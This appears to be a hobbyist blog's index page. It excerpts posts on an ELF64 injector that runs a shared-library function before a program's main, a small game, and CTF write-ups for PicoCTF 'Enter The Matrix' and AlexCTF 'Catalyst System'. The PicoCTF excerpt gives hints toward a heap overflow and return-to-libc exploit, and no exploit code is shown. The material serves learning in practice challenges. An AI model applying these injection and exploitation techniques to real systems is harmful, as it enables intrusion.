In Your Elf

I made a fun tool in order to learn a bit more about linux elf64 headers. It will run an exported function from a shared library before running the original main function.

Right now, it requires the code to use dlopen and dlsym, so we can steal those references. We also do not support PIE binaries. To fix this, in the future I would not require dlopen and dlsym, but implement my own pseudo linker thing.

Either way, it was a great way to learn more about executables in linux. I was inspired by the post on 0x00sec by pico (https://0x00sec.org/t/elfun-file-injector/410).

Sorry about this one

I made a small game for this month’s project. It isn’t much to look at.

It was fun getting more comfortable with blender, and actually finishing a (very) small game. Hopefully more of this in the future!

Sorry the game is a bit tasteless. When I was a middle schooler, I played a flash game with a similar concept, and I thought it was the funniest idea in the world.

PicoCTF : Enter The Matrix WriteUp

PicoCTF is a CTF “targeted at middle and high school students,” but I have always found them to be fun practice. This year (2017) especially, I thought the Binary Exploitation challenges were entertaining. This writeup will be about “Enter The Matrix,” in level 3.
The challenge description is:

The Matrix awaits you,. Take the red pill and begin your journey. Source. Jack in at shell2017.picoctf.com:19369.

This was a good challenge, involving a heap overflow and a return-to-libc attack. I implemented my exploit in golang, and you can see my source code at the bottom of this post.

Hints

If you are working on this problem, I will start with a few hints that don’t give everything away.

  1. Try playing with different non-symmetrical matrices.
  2. You can ssh into the machine that is running the challenge.
  3. gdb will give you incorrect libc offsets for outside of gdb.
  4. On that machine you can use “readelf -s /lib32/libc.so.6” to get function offsets for anything you need.
  5. Free is passed a pointer to data you control.

Continue reading PicoCTF : Enter The Matrix WriteUp

AlexCTF : Catalyst System WriteUp

This year we got a group together to do AlexCTF. Most all the problems were fun, and overall I enjoyed the event.
Of the initial challenges released Friday, I had the most fun with the Reverse Engineering 3, Catalyst System challenge.

A quick aside about the two tools I used for this challenge; Radare2 and Z3. Radare2 is my favorite binary analysis or debugging tool. There is a bit of a learning curve, but it is powerful and open sourced! (Also, I love that no one knows how to say Radare, so you get all sorts of fun interpretations.) If you are still using gdb, I highly recommend taking the time to get to know it. Z3 is a high-performance theorem prover (it does the math I can’t be bothered with). Continue reading AlexCTF : Catalyst System WriteUp